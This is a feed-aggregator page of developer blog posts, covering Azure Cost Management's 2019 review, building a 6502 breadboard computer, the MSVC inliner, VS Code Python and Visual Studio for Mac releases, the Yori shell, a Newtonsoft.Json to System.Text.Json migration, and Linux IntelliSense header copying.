Quantcast
Channel: Category Name
Viewing all 5971 articles
Browse latest View live

Azure Cost Management 2019 year in review

$
0
0

When we talk about cost management, we focus on three core tenets:

  1. Ensuring cost visibility so everyone is aware of the financial impact their solutions have.
  2. Driving accountability throughout the organization to stop bad spending patterns.
  3. Continuous cost optimization as your usage changes over time to do more with less.

These were the driving forces in 2019 as we set out to build a strong foundation that pulls together all costs across all account types and ensures everyone in the organization has a means to report on, control, and optimize costs. Our ultimate goal is to empower you to lead a healthier, more financially responsible organization.

All costs behind a single pane of glass

On the heels of the Azure Cost Management preview, 2019 started off strong with the general availability of Enterprise Agreement (EA) accounts in February and pay-as-you-go (PAYG) in April. At the same time, Microsoft as a whole embarked on a journey to modernize the entire commerce platform with the new Microsoft Customer Agreement (MCA), which started rolling out for enterprises in March, pay-as-you-go subscriptions in July, and Cloud Solution Providers (CSP) using Azure plan in November. Whether you get Azure through the Microsoft field, directly from Azure.com, or through a Microsoft partner, you have the power of Azure Cost Management at your fingertips. But getting basic coverage of your Azure usage is only part of the story.

To effectively manage costs, you need all costs together, in a single repository. This is exactly what Azure Cost Management brings you. From the unprecedented ability to monitor Amazon Web Services (AWS) costs within the Azure portal in May (a first for any cloud provider), to the inclusion of reservation and Marketplace purchases in June, Azure Cost Management enables you to manage all your costs from a single pane of glass, whether you're using Azure or AWS.

What's next?

Support for Sponsorship and CSP subscriptions not on an Azure plan are at the top of the list to ensure every Azure subscription can use Azure Cost Management. AWS support will become generally available and then Google Cloud Platform (GCP) support will be added.

Making it easier to report on and analyze costs

Getting all costs in one place is only the beginning. 2019 also saw many improvements that help you report on and analyze costs. You were able to dig in and explore costs with the 2018 preview, but the only way to truly control and optimize costs is to raise awareness of current spending patterns. To that end, reporting in 2019 was focused on making it easier to customize and share.

The year kicked off with the ability to pin customized views to the Azure portal dashboard in January. You could share links in May, save views directly from cost analysis in August, and download charts as an image in September. You also saw a major Power BI refresh in October that no longer required classic API keys and added reservation details and recommendations. Each option helps you not only save time, but also starts that journey of driving accountability by ensuring everyone is aware of the costs they're responsible for.

Looking beyond sharing, you also saw new capabilities like forecasting costs in June and switching between currencies in July, simpler out-of-the-box options like the new date picker in May and invoice details view in September, and changes that simply help you get your job done the way you want to like support for the Azure portal dark theme and continuous accessibility improvements throughout the year.

From an API automation and integration perspective, 2019 was also a critical milestone as EA cost and usage APIs moved to Azure Resource Manager. The Resource Manager APIs are forward-looking and designed to minimize your effort when it comes time to transition to Microsoft Customer Agreement by standardizing terminology across account types. If you haven't started the migration to the Resource Manager APIs, make that your number one resolution for the new year!

What's next?

2020 will continue down this path, from more flexible reporting and scheduling email notifications to general improvements around ease of use and increased visibility throughout the Azure portal. Power BI will get Azure reservation and Hybrid Benefit reports as well as support for subscription and resource group users who don't have access to the whole billing account. You can also expect to see continued API improvements to help make it easier than ever to integrate cost data into your business systems and processes.

Flexible cost control that puts the power in your hands

Once you understand what you're spending and where, your next step is to figure out how to stop the bad spending patterns and keep costs under control. You already know you can define budgets to get notified about and take action on overages. You decide what actions you want to take, whether that be as simple as an email notification or as drastic as deleting all your resources to ensure you won't be charged. Cost control in 2019 was centered on helping you stay on top of your costs and giving you the tools to control spending as you see fit.

This started with a new, consolidated alerts experience in February where you can see all your invoice, credit, and budget overage alerts in a single place. Budgets were expanded to support new account types we talked about above, and to support management groups in June giving you a view of all your costs across subscriptions. Then in August, you were able to create targeted budgets with filters for fine-grained tracking, whether that be for an entire service, a single resource, or an application that spans multiple subscriptions (via tags). This also came with an improved experience when creating budgets to help you better estimate what your budget should be based on historical and forecasted trends.

What's next?

2020 will take cost control to the next level by allowing you to split shared costs with cost allocation rules and define an additional markup for central teams who typically run on overhead or don't want to expose discounts to the organization. We're also looking at improvements around management groups and tags to give you more flexibility to manage costs the way you need to for your organization.

New ways to save and do more with less

Cloud computing comes with a lot of promises, from flexibility and speed to scalability and security. The promise of cost savings is often the driving force behind cloud migrations, yet is also one of the more elusive to achieve. Luckily, Azure delivers new cost optimization opportunities nearly every month! This is on top of the recommendations offered by Azure Advisor, which are specifically tuned to save money on the resources you already have deployed. Here are a few of the over two dozen new cost saving opportunities you saw in 2019:

What's next?

Expect to see continued updates in these areas through 2020. We're also partnering with individual service teams to deliver even more built-in recommendations for database, storage, and PaaS services, just to name a few.

Streamlined account and subscription management

Throughout 2019, you may have noticed a lot of changes to Cost Management + Billing in the Azure portal. What was purely focused on PAYG subscriptions in early 2018 became a central hub for billing administrators in 2019 with full administration for MCA accounts in March, new EA account management capabilities in July, and subscription provisioning and transfer updates in August. All of these are helping you get one step closer to having a single portal to manage every aspect of your account.

What's next?

2020 will be the year of converged and consolidated experiences for Cost Management + Billing. This will start with the Billing and Cost Management experiences within the Azure portal and will expand to include capabilities you're currently using the EA, Account, or Cloudyn portals for today. Whichever portal you use, expect to see all these come together into a single, consolidated experience that has more consistency across account types. This will be especially evident as your account moves from the classic EA, PAYG, and CSP programs to Microsoft Customer Agreement (and Azure plan), which is fully managed within the Azure portal and offers critical new billing capabilities, like finer-grained access control and grouping subscriptions into separate invoices.

Looking forward to another year

The past 12 months have been packed with one improvement after another, and we're just getting started! We couldn't list them all here, but if you only take one thing away, please do check out and subscribe to the Azure Cost Management monthly updates for the latest news on what's changed and what's coming. We've already talked about what you can expect to see in 2020 for each area, but the key takeaway is:

2020 will bring one experience to manage all your Azure, AWS, and GCP costs from the Azure portal, with simpler, yet more powerful cost reporting, control, and optimization tools that help you stay more focused on your mission.

We look forward to hearing your feedback as these new and updated capabilities become available. And if you're interested in the latest features, before they're available to everyone, check out Azure Cost Management Labs (introduced in July) and don’t hesitate to reach out with any feedback. Cost Management Labs gives you a direct line to the Azure Cost Management engineering team and is the best way to influence and make an immediate impact on features being actively developed and tuned for you.

Follow @AzureCostMgmt on Twitter and subscribe to the YouTube channel for updates, tips, and tricks! And, as always, share your ideas and vote up others in the Cost Management feedback forum. See you in 2020!


The wires are crossed, literally! – Learning low level computing with Ben Eater’s 6502 kit

$
0
0

I've blogged about the importance of the LED Moment. You know, that moment when you get it to blink.

Ben Eater is a bit of an internet legend. His site at https://eater.net has a shop and YouTube videos where he's creating educational videos showing low level (and some what historical) computing.

He's known for "building an 8-bit CPU from scratch."

This tutorial walks through building a fully programmable 8-bit computer from simple logic gates on breadboards.

imageSimple logic gates? Yep, like && and || and 7400 series chips and what not. I learned on these 25 years ago in college and I sucked at it. I think I ended up making A CLOCK. Ben makes A COMPUTER.

This Christmas my gift to myself was to learn to build a 6502 computer (that's the processor that powered the Apple ][, the NES, the C64, the BBC Micro and more - it's literally the processor of my entire childhood). Ben has made the videos available free on YouTube and the parts list can be sourced however you'd like, but I chose to get mine directly from Ben as he's done all the work of putting the chips and wires in a box. I got the 6502 Computer Kit, the Clock Module Kit, and an EEPROM Programmer. I also ordered a Quimat 2.4" TFT Digital Oscilloscope Kit which is AMAZING for the value. Later I ordered a Pokit Oscilloscope that will use my phone for the screen.

I'm about halfway through the videos. There are 4 videos of about 1 hour each, but I've been following along and pausing. Ben will wire something up and speed up the video, so each 1 hour video has taken me about 4-5 hours of actual time, as I'm cutting and stripping wires manually and trying to get my board to look and behave like Ben's in the video. More importantly, I made the promise to myself that I'd not continue if I didn't understand (mostly) what was happening AND I wouldn't continue if my board didn't actually work.

At the middle-end of Video 2, we're hooking up a newly flashed EEPROM that has our computer program on it. This isn't even at Assembly Language yet - we're writing the actual Hex Codes of the processor instructions into a 32768 byte long binary file and then flashing the result to an EEPROM and reseating it each time.

Madness! Flashing an EEPROM

I'd respectfully ask that you follow me on Instragram as I'm documenting my experience in photos.

A few days ago I was manually stepping (one clock pulse at a time) through some code and I kept getting "B2" - and by "getting" that value, I mean that quite literally there are 8 blue wires coming off the data line (8 pins) on an EEPROM and they are going to turn 8 LEDs on or off. I wanted to get the number "AA."

What. I'm getting B2, I want AA. I have no idea. Do I pull it apart and redo the whole board? How many hours ago did I make a mistake? 3? 7? I was sad and dejected.

And I stared.

But then I thought. Why is AA is a lovely hex number? Because it's as it's alternating 1s and 0s, of 10101010.

I was getting B2 which is 10110010.

10110010

10110010

I had swapped two of the wires going from the EEPROM to the Processor. I was getting exactly what I asked for. I swapped to wires/pins so the bins were swapped.

I wasn't groking it until I stopped a thought and looked from multiple angles. What am I doing? What's my goal? What is physically happening here? What abstractions have I added? (even voltage -> binary -> hex is three abstractions!)

It seems a small and stupid thing. Perhaps you, Dear Reader, immediately knew what I had done wrong and were shouting it at this blog post 3 paragraphs ago. Perhaps you've never spent 13 hours debugging a Carriage Return.

But I didn't understand. And then I did. And I swapped two wires and it worked, dammit. Here is a video of it working, in fact.

It felt very good. My jaw dropped.

I feel like NOW, today, I'm ready to go to college and fix my B in Electronics Class.

Youth is wasted on the young, my friends. What have YOU been learning lately?


Sponsor: Like C#? We do too! That’s why we've developed a fast, smart, cross-platform .NET IDE which gives you even more coding power. Clever code analysis, rich code completion, instant search and navigation, an advanced debugger... With JetBrains Rider, everything you need is at your fingertips. Code C# at the speed of thought on Linux, Mac, or Windows. Try JetBrains Rider today!



© 2019 Scott Hanselman. All rights reserved.
     

C++ Inliner Improvements: The Zipliner

$
0
0

Visual Studio 2019 versions 16.3 and 16.4 include improvements to the C++ inliner. Among these is the ability to inline some routines after they have been optimized, referred to as the “Zipliner.” Depending on your application, you may see some minor code quality improvements and/or major build-time (compiler throughput) improvements. 

C2 Inliner

Terry Mahaffey has provided an overview of Visual Studio’s inlining decisions. This details some of the inliner’s constraints and areas for improvement, a few of which are particularly relevant here: 

  1. The inliner is recursive and may often re-do work it has already done. Inline decisions are context sensitive and it is not always profitable to replay its decision-making for the same function. 
  2. The inliner is very budget conscious. It has the difficult job of balancing executable size with runtime performance. 
  3. The inliner’s view of the world is always “pre-optimized.” It has very limited knowledge of copy propagation and dead control paths for example.

Modern C++

Unfortunately, many of the coding patterns and idioms common to heavy generic programming bump into those constraints. Consider the following routine in the Eigen library:

Eigen::Matrix<float,-1,1,0,-1,1>::outerStride(void)

which calls innerSize:

template<typename Derived> class DenseBase 
... 
Index innerSize() const 
{ 
    return IsVectorAtCompileTime ? this->size() 
         : int(IsRowMajor) ? this->cols() : this->rows(); 
}

That instantiation of outerStride does nothing but return one of its members. Therefore, it is an excellent candidate for full inline expansion. To realize this win though the compiler must fully evaluate and expand outerStride’s 18 total callees, for every callsite of outerStride in the module. This eats into both the optimizer throughput as well as the inliner’s code-size budget. It also bears mentioning that calls to ‘rows’ and ‘cols’ are inline-expanded as well, even though those are on a statically dead path.

It would be much better if the optimizer just inlined the two-line member return:

?outerStride@?$Matrix@N$0?0$0?0$0A@$0?0$0?0@Eigen@@QEBA_JXZ PROC ; Eigen::Matrix<double,-1,-1,0,-1,-1>::outerStride, COMDAT 
mov	
    rax, QWORD PTR [rcx+8] 
    ret 0

Inlining Optimized IR

For a subset of routines the inliner will now expand the already-optimized IR of a routine, bypassing the process of fetching IR, and re-expanding callees. This has the dual purpose of expanding callsites much faster, as well as letting the inliner measure its budget more accurately. 

First, the optimizer will summarize that outerStride is a candidate for this faster expansion when it is originally compiled (Remember that c2.dll tries to compile routines before their callers). Then, the inliner may replace calls to that outerStride instantiation with the field access. 

The candidates for this faster inline expansion are leaf functions with no locals, which refer to at most two different arguments, globals, or constants. In practice this targets most simple getters and setters.

Benefits

There are many examples like outerStride in the Eigen library where a large call tree expands into just one or two instructions. Modules that make heavy use of Eigen may see a significant throughput improvement; we measured the optimizer taking up to 25-50% less time for such repros. 

The new Zipliner will also enable the inliner to measure its budget more accurately. Eigen developers have long been aware that MSVC does not inline to their specifications (see EIGEN_STRONG_INLINE). Zipliner should help to alleviate some of this concern, as a ziplined routine is now considered a virtually “free” inline.

Give the feature a try

This is enabled by default in Visual Studio 2019 16.3, along with some improvements in 16.4. Please download Visual Studio 2019 and give the new improvements a try. We can be reached via the comments below or via email (visualcpp@microsoft.com). If you encounter problems with Visual Studio or MSVC, or have a suggestion for us, please let us know through Help > Send Feedback > Report A Problem / Provide a Suggestion in the product, or via Developer Community. You can also find us on Twitter (@VisualC).

The post C++ Inliner Improvements: The Zipliner appeared first on C++ Team Blog.

Python in Visual Studio Code – January 2020 Release

$
0
0

We are pleased to announce that the January 2020 release of the Python Extension for Visual Studio Code is now available. You can download the Python extension from the Marketplace, or install it directly from the extension gallery in Visual Studio Code. If you already have the Python extension installed, you can also get the latest update by restarting Visual Studio Code. You can learn more about  Python support in Visual Studio Code in the documentation.  

In this release we addressed 59 issues, including: 

  • Kernel selection in Jupyter Notebooks  
  • Performance improvements in the Jupyter Notebook editor
  • Auto-activation of environments in the terminal on load (thanks Igor Aleksanov!) 
  • Fixes to rebuilding ctags on save and on start 

 If you’re interested, you can check the full list of improvements iour changelog. 

Kernel selection in Jupyter Notebooks 

Showcasing kernel selection in the VS Code Notebook Edit

In the top right of the Notebook Editor and the Interactive Window, you will now be able to see the current kernel that the notebook is using along with the kernel status (i.e. whether it is idle, busy, etc…)This release also allows you to change your kernel to other Python kernelsTo change your current active kernel, click on the current kernel to bring uthe VS Code kernel selector and select which kernel you want to switch to from the list. 

Performance improvements in the Jupyter Notebook editor! 

This release includes many improvements to the performance of Jupyter in VS Code in both the Notebook editor and the Interactive Window. This was accomplished through caching previous kernels and through optimizing the search for Jupyter. Some of the significant improvements due to these changes are: 

  • Initial starting of the Jupyter server is faster, and subsequent starts of the Jupyter server are more than 2X faster  
  • Creating a blank new Jupyter notebook is 2X faster 
  • Opening Jupyter Notebooks (especially with a large file size) is now 2x faster 

Note: these performance calculations were measured in our testing, your improvements may vary. 

Auto-activation of environments in the terminal on load 

When you have a virtual or conda environment selected in your workspace and you create a new terminal, the Python extension activates the selected environment in that new terminal. Now, this release includes the option of having environments to be auto activated in an already open terminal right when the Python extension loads.  

Environment activated in VS Code terminal when Python extension loads

To enable this feature, you can add the setting “python.terminal.activateEnvInCurrentTerminal“: true to your settings.json file. Then when the extension loads and there’s a terminal open in VS Code, the selected environment will be automatically activated.  

Fixes to rebuilding ctags on save and on start 

The ctags tool is responsible for generating workspace symbols for the user. As a result, the document outline becomes populated with file symbols, allowing you to easily find these symbols (such as functions) within your workspace.  

This release includes a fix for the most upvoted bug report on our GitHub repo (GH793), related to ctags. Now, tags stored in the .vscode folder for your project can be rebuilt when the Python extension loads by setting “python.workspaceSymbols.rebuildOnStart” to true, or rebuilt on every file save by setting “python.workspaceSymbols.rebuildOnFileSave” to true. 

Tags file rebuilt on save and when Python extension loads

You can learn more about ctags support in our documentation. 

Other Changes and Enhancements 

We have also added small enhancements and fixed issues requested by users that should improve your experience working with Python in Visual Studio Code. Some notable changes include: 

  • Support the ability to take input from users inside of a notebook or the Interactive Window. (#8601) 
  • Support local images in markdown and output for notebooks. (#7704) 
  • Support saving plotly graphs in the Interactive Window or inside of a notebook. (#7221) 
  • Use “conda run” when executing Python and an Anaconda environment is selected. (#7696) 
  • Activate conda environment using path when name is not available. (#3834) 
  • Add QuickPick dropdown option to Run All/Debug All  parametrized tests. (thanks to Philipp Loose) (#5608)

We’re constantly A/B testing new features. If you see something different that was not announced by the team, you may be part of the experiment! To see if you are part of an experiment, you can check the first lines in the Python extension output channel. If you wish to opt-out of A/B testing, you can open the user settings.json file (View Command Palette… and run Preferences: Open Settings (JSON)) and set the “python.experiments.enabled” setting to false  

Be sure to download the Python extension for Visual Studio Code now to try out the above improvements. If you run into any problems, please file an issue on the Python VS Code GitHub page. 

 

 

The post Python in Visual Studio Code – January 2020 Release appeared first on Python.

Visual Studio 2019 for Mac version 8.4 is now available

$
0
0

The Visual Studio for Mac team is kicking off the new year with our best release ever! Visual Studio 2019 for Mac version 8.4, released today, brings several exciting enhancements to the developer experience. Many of these items were top requests from our community and include:

To learn more about all of the changes in this release of Visual Studio for Mac, see our release notes.

Be up to date with .NET Core 3.1

This release of Visual Studio for Mac adds full support for .NET Core 3.1. You’ll be able to create .NET Core 3.1 applications and take them from building and debugging through publishing. .NET Core 3.1 is a long-term supported (LTS) release, meaning it will continue to be supported for three years.

For more details on the full set of changes introduced by .NET Core 3.1, see the release notes.

Develop faster with ASP.NET Core Scaffolding

Our community has suggested we add ASP.NET Core Scaffolding to Visual Studio for Mac. We listened and brought Scaffolding for ASP.NET Core projects to Visual Studio for Mac version 8.4. Scaffolding speeds up and simplifies ASP.NET Core app development by generating boilerplate code for common scenarios.

Click on the New Scaffolding… entry in the Add flyout of the project context menu to access the Scaffolding feature for your ASP.NET Core projects in Visual Studio for Mac. The node on which you opened the right-click context menu will be the location where the generated files will be placed.

A scaffolding wizard will pop up to assist in generating code into your project. I’m using one of our ASP.NET Core sample projects – a movie database app – to demonstrate scaffolding in action. I’ve used the new feature to create pages for Create, Read, Update, and Delete operations (CRUD) and a Details page for the movie model.

Scaffolding wizard for ASP.NET Core project in Visual Studio for Mac

Once the wizard closes, it will add the required NuGet packages to your project and create additional pages, based on the scaffolder you chose.

You can also take a look at our documentation for more information on Scaffolding ASP.NET Core projects.

Build and publish ASP.NET Core Blazor Server applications

In addition to ASP.NET Core Scaffolding, we’ve also added support for developing and publishing ASP.NET Core Blazor Server applications based on feedback from our users. Blazor is a framework for building interactive client-side web UI using .NET and brings with it several advantages including the ability to:

  • Write interactive web UIs using C# instead of JavaScript
  • Leverage the existing .NET ecosystem of .NET libraries
  • Share app logic across server and client
  • Benefit from .NET’s performance, reliability, and security
  • Build on a common set of easy-to-use, stable, feature-rich languages, frameworks, and tools

Blazor uses open web standards and requires no additional plugins or code transpilation meaning that anything you develop using it will work in all modern web browsers on the desktop or on mobile. If you’re interested in learning more about Blazor, check out the Blazor webpage.

With Visual Studio 2019 for Mac 8.4, you can create new Blazor Server projects complete with the ability to build, run, and debug. When creating a New Project, you’ll now find the Blazor Server App project template.

Visual Studio for Mac New Project Dialog with Blazor Server App template selected

When working with Blazor applications, you’ll be working with .razor files. Visual Studio 2019 for Mac version 8.4 brings full support for colorization and completions when working with these files in the editor.

You can publish your Blazor applications directly to Azure App Service using Visual Studio for Mac. Get started with a free Azure account if you don’t already have one by signing up here. You’ll get access to a number of popular services, and over 25 always free services with your account.

Be more productive with editor improvements

Visual Studio for Mac now supports full colorization, completion, and IntelliSense for .razor files. We’ve continued to work on adding features that were suggested to us by our users. This feedback has caused us to bring back preview boxes for code changes that may occur from a code fix or analysis suggestion. Colorization has also been tweaked to be more consistent with the Windows Visual Studio 2019 experience.

Work in the IDE using assistive technologies

We know it’s important to support various assistive technologies in order to ensure Visual Studio for Mac can be used by all. Ensuring the developer experience is accessible to anyone is extremely important to us and we’re committed to empowering everyone to develop on the Mac. You’ll find the following improvements and more available in Visual Studio for Mac 8.4:

  • Better focus order when navigating using assistive technologies
  • Higher color contrast ratios for text and icons
  • Reduction of keyboard traps hindering IDE navigation
  • More accurate VoiceOver dictation and navigation
  • Completely rewritten IDE components to make them accessible
  • Expanded VoiceOver coverage for alert text

While we’ve made rapid progress improving accessibility of the entire IDE over the last few months, we know there’s still a lot more we can do to improve to ensure Visual Studio for Mac can delight everyone. Accessibility will continue to be a top priority for our team. We welcome your feedback to assist us in guiding this work. As the PM leading the accessibility effort, I invite you to reach out to me directly via dominicn@microsoft.com if you’d be willing to share your expertise or if you’d like to speak with me in more detail about our work so far.

Distribute .NET Core library projects with NuGet Pack support

Interested in distributing .NET Core class libraries you’ve created to a broader audience? We’ve made it easy for developers to create a NuGet package from a .NET Core library project in Visual Studio for Mac by right-clicking a project then selecting Pack.

Creating a NuGet package using Pack in Visual Studio for Mac

Once you’ve selected the Pack menu option for your library project, a NuGet package (.nupkg) file will be generated in the output folder.

Update to Visual Studio 2019 for Mac version 8.4 today!

In this post, you learned about all the new improvements in the Visual Studio for Mac experience. Now it’s time to download the release or update to the latest version on the Stable channel and give these new features and enhancements a try!

If you have any feedback you’d like to share on this version of Visual Studio for Mac, we invite you to reach out to us on Twitter at @VisualStudioMac. If you run into any issues, you can use Report a Problem to provide us with details and notify the team. In addition to issues, we welcome feature suggestions on the Visual Studio Developer Community website.

Happy coding and a happy new year from all of us on the Visual Studio for Mac team!

The post Visual Studio 2019 for Mac version 8.4 is now available appeared first on Visual Studio Blog.

Updated Microsoft Online Services Terms are available to our customers around the world

Government data protection—earning and retaining the public’s trust with Microsoft 365

8 new ways to empower Firstline Workers and transform the way they work with Microsoft 365


Yori – The quiet little CMD replacement that you need to install NOW

$
0
0

I did a post on the difference between a console, a terminal, and a shell a while back. We talk a lot about alternative "Terminals" like the Windows Terminal (that you should download immediately) but not shells. You do see a lot of choices in the Linux space with the top give being Bash, Zsh, Fish, Tcsh, and Ksh but not a lot about alternative shells for Windows. Did you love 4DOS? Well, READ ON. (Yes I know TCC is a thing, but Yori is a different thing)

So let's talk about a quiet little CMD replacement shell that is quietly taking over my life. You should check it out and spend some time with it. It's called Yori and it's open source and it's entirely written by one Malcolm Smith. It deserves your attention and respect because Yori has quickly become my goto "DOS but not DOS" prompt.

Yori is DOS, kinda

Of course, cmd.exe isn't DOS but it's evocative of DOS and it's "Close enough to be DOS." It'll run .cmd files and batch files. If dir, and del *.*, and rd /s feels more intuitive to you than bash shell commands, Yori will fit into your life nicely.

I use PowerShell a lot as a shell and I use Bash via WSL and Ubuntu but since I started on CMD (or command.com, even) Yori feels very comfortable because it's literally "CMD reimagined."Yori offers a number of cmd++ enhancements like:

  • Autocomplete suggestions as you type
  • Ctrl+to select Values
  • WAY better Tab completiion
  • Awesome file matching
  • Beyond MAX_PATH support for "DOS"
  • Rich Text Copy!
  • Backquote support
  • Background Jobs like Unix but for DOS. SO you can use & like a real person!
  • Alias! My goodness!
  • which (like where, but it's which!) command
  • hexdump, lines, touch, and more great added tools
  • lots of "y" utils like ydate and ymem and ymore.
  • New Environment variables make your batch files shine
  • ANSI colors/UTF-8 support!

Download Yori, make a link, pin it, or add it to your Windows Terminal of choice (see below), and then explore the extensive Guide To Yori.

Did I mention & jobs support! How often have you done a copy or xcopy and wanted to &! it and then check it later with job? Now you can!

C:UsersScottDesktop>dir &!

Job 2: c:Program FilesYoriydir.exe
C:UsersScottDesktop>job
Job 1 (completed): c:Program FilesYoriydir.exe
Job 2 (executing): c:Program FilesYoriydir.exe
Job 2 completed, result 0: c:Program FilesYoriydir.exe

Yori also support updating itself with "ypm -u" which is clever. Other lovely Yori-isms that will make you smile?

  • cd ~ - it works
  • cd ~desktop - does what you think it'd do
  • Win32 versions of UNIX favorites including cut, date, expr, fg, iconv, nice, sleep, split, tail, tee, wait and which
  • dir | clip - supports HTML as well!
  • durable command history

And don't minimize the amount of work that's happened here. It's a LOT. And it's a great balance between compatibility and breaking compatibility to bring the best of the old and the best of the new into a bright future.

Other must-have Malcolm Smith Tools

Now that I've "sold" you Yori (it's free!) be sure to pick up sdir (so good, a gorgeous dir replacement) and other lovely tools that Malcolm has written and put them ALL in your c:utils folder (you have one, right? Make one! Put it in DropBox/OneDrive! Then add it to your PATH on every machine you have!) and enjoy!

Yori is lovely, paired with SDIR

Adding Yori to the Windows Terminal

Yori includes it's own improved Yori-specific terminal (to go with the Yori shell) but it also works with your favorite terminal.

If you are using the Windows Terminal, head over to your settings file (from the main Windows Terminal menu) and add something like this for a Yori menu. You don't need all of this, just the basics like commandline. I added my own colorScheme and tabTitle. You can salt your own to taste.

{

"acrylicOpacity": 0.85000002384185791,
"closeOnExit": true,
"colorScheme": "Lovelace",
"commandline": "c://Program Files//Yori//yori.exe",
"cursorColor": "#00FF00",
"cursorHeight": 25,
"cursorShape": "vintage",
"fontFace": "Cascadia Code",
"fontSize": 20,
"guid": "{7d04ce37-c00f-43ac-ba47-992cb1393215}",
"historySize": 9001,
"icon": "ms-appdata:///roaming/cmd-32.png",
"name": "DOS but not DOS",
"padding": "0, 0, 0, 0",
"snapOnInput": true,
"startingDirectory": "C:/Users/Scott/Desktop",
"tabTitle": "DOS, Kinda",
"useAcrylic": true
},

Great stuff!

I want YOU, Dear Reader, to head over to https://github.com/malxau/yori right now and give Yori and Malcolm a STAR. He's got 110 as of the time of this posting. Let's make that thousands. There's so many amazing folks out there quietly writing utilities for themselves, tirelessly, and a star is a small thing you can do to let them know "I see you and I appreciate you."


Sponsor: Curious about the state of software security as we head into 2020? Check out Veracode’s 2019 SOSS X report to learn common vulnerability types, how to improve fix rates, and crucial industry data.



© 2019 Scott Hanselman. All rights reserved.
     

Updating my ASP.NET podcast site to System.Text.Json from Newtonsoft.Json

$
0
0

JSON LogoNow that .NET Core 3.1 is LTS (Long Term Support) and will be supported for 3 years, it's the right time for me to update all my .NET Core 2.x sites to 3.1. It hasn't take long at all and the piece of mind is worth it. It's nice to get all these sites (in the Hanselman ecosystem LOL) onto the .NET Core 3.1 mainline.

While most of my sites working and running just fine - the upgrade was easy - there was an opportunity with the podcast site to move off the venerable Newtonsoft.Json library and move (upgrade?) to System.Text.Json. It's blessed by (and worked on by) James Newton-King so I don't feel bad. It's only a good thing. Json.NET has a lot of history and existed before .NET Standard, Span<T>, and existed in a world where .NET thought more about XML than JSON.

Now that JSON is essential, it was time that JSON be built into .NET itself and System.Text.Json also allows ASP.NET Core to existed without any compatibility issues given its historical dependency on Json.NET. (Although for back-compat reasons you can add Json.NET back with one like using AddJsonOptions if you like).

Everyone's usage of JSON is different so your mileage will depend on how much of Json.NET you used, how much custom code you wrote, and how deep your solution goes. My podcast site uses it to access a number of JSON files I have stored in Azure Storage, as well as to access 3rd party RESTful APIs that return JSON. My podcast site's "in memory database" is effectively a de-serialized JSON file.

I start by bringing in two namespaces, and removing Json.NET's reference and seeing if it compiles! Just rip that Band-Aid off fast and see if it hurts.

using System.Text.Json;

using System.Text.Json.Serialization;

I use Json Serialization in Newtonsoft.Json and have talked before about how much I like C# Type Aliases. Since I used J as an alias for all my Attributes, that made this code easy to convert, and easy to read. Fortunately things like JsonIgnore didn't have their names changed so the namespace was all that was needed there.

NOTE: The commented out part in these snippets is the Newtonsoft bit so you can see Before and After

//using J = Newtonsoft.Json.JsonPropertyAttribute;

using J = System.Text.Json.Serialization.JsonPropertyNameAttribute;

/* SNIP */

public partial class Sponsor
{
[J("id")]
public int Id { get; set; }

[J("name")]
public string Name { get; set; }

[J("url")]
public Uri Url { get; set; }

[J("image")]
public Uri Image { get; set; }
}

I was using Newtonsoft's JsonConvert, so I changed that DeserializeObject call like this:

//public static v2ShowsAPIResult FromJson(string json) => JsonConvert.DeserializeObject<v2ShowsAPIResult>(json, Converter.Settings);

public static v2ShowsAPIResult FromJson(string json) => JsonSerializer.Deserialize<v2ShowsAPIResult>(json);

In other classes some of the changes weren't stylistically the way I'd like them (as an SDK designer) but these things are all arguable either way.

For example, ReadAsAsync<T> is a super useful extension method that has hung off of HttpContent for many years, and it's gone in .NET 3.x. It was an extension that came along for the write inside Microsoft.AspNet.WebApi.Client, but it would bring Newtonsoft.Json back along for the ride.

In short, this Before becomes this After which isn't super pretty.

return await JsonSerializer.DeserializeAsync<List<Sponsor>>(await res.Content.ReadAsStreamAsync());

//return await res.Content.ReadAsAsync<List<Sponsor>>();

But one way to fix this (if this kind of use of ReadAsAsync is spread all over your app) is to make your own extension class:

public static class HttpContentExtensions

{
public static async Task<T> ReadAsAsync<T>(this HttpContent content) =>
await JsonSerializer.DeserializeAsync<T>(await content.ReadAsStreamAsync());
}

My calls to JsonConvert.Serialize turned into JsonSerializer.Serialize:

//public static string ToJson(this List<Sponsor> self) => JsonConvert.SerializeObject(self);

public static string ToJson(this List<Sponsor> self) => JsonSerializer.Serialize(self);

And the reverse of course with JsonSerializer.Deserialize:

//public static Dictionary<string, Shows2Sponsor> FromJson(string json) => JsonConvert.DeserializeObject<Dictionary<string, Shows2Sponsor>>(json);

public static Dictionary<string, Shows2Sponsor> FromJson(string json) => JsonSerializer.Deserialize<Dictionary<string, Shows2Sponsor>>(json);

All in all, far easier than I thought. How have YOU found System.Text.Json to work in your apps?


Sponsor: When DevOps teams focus on fixing new flaws first, they can add to mounting security debt. Veracode’s 2019 SOSS X report spotlights how developers can reduce fix rate times by 72% with frequent scans.


© 2019 Scott Hanselman. All rights reserved.
     

Improvements to Accuracy and Performance of Linux IntelliSense

$
0
0

This blog post was written by Paul Maybee, a Principal Software Engineer on the C++ Cross-Platform Team. 

Accurate C++ IntelliSense requires access to the C++ headers that are referenced by C++ source files. For Linux scenarios the headers referenced by a Linux MSBuild or CMake project are copied to Windows by Visual Studio from the Linux device (or VM, or Docker container, or WSL system) being targeted for the build. Visual Studio then uses these headers to provide IntelliSense. If the headers are not the correct versions, for example they are gcc headers rather than clang headers, or C++11 headers rather than C++17 headers, then the IntelliSense may be incorrect, which can be very confusing to the user. Also, for some scenarios the number of headers can be very large and so the copy can take a long time. Visual Studio 2019 version 16.5 Preview 1 improves both the accuracy and the performance of the header copy, providing better IntelliSense for Linux projects.

Remote Connections

When making a new remote connection using the Visual Studio connection manager the old default behavior was to copy the headers from the remote Linux target to a local Windows cache location immediately after adding the connection. This is no longer done or necessary. Headers are now copied on demand when opening a Linux project or configuring CMake for a Linux target. The copy now occurs in the background.

The Connection Manager for remote Linux projects in Visual Studio.

The connection manager’s remote headers dialog has also changed. Caching for each connection can be explicitly enabled or disabled. The default for a new connection is to be enabled. The user may also select a connection and:

  • Press the Update button to on-demand download the headers for the connection.
  • Press the Delete button to delete the header cache for the connection.
  • Press the Explore button to open the connection’s cache location in the file browser.

Linux Project Properties

There are three new Linux project properties to help the user control header copying: Remote Copy Include Directories, Remote Copy Exclude Directories, and IntelliSense Uses Compiler Defaults.

New configuration properties for a C++ Linux project including Remote Copy Include Directories, Remote Copy Exclude Directories, and IntelliSense Use Compiler Defaults

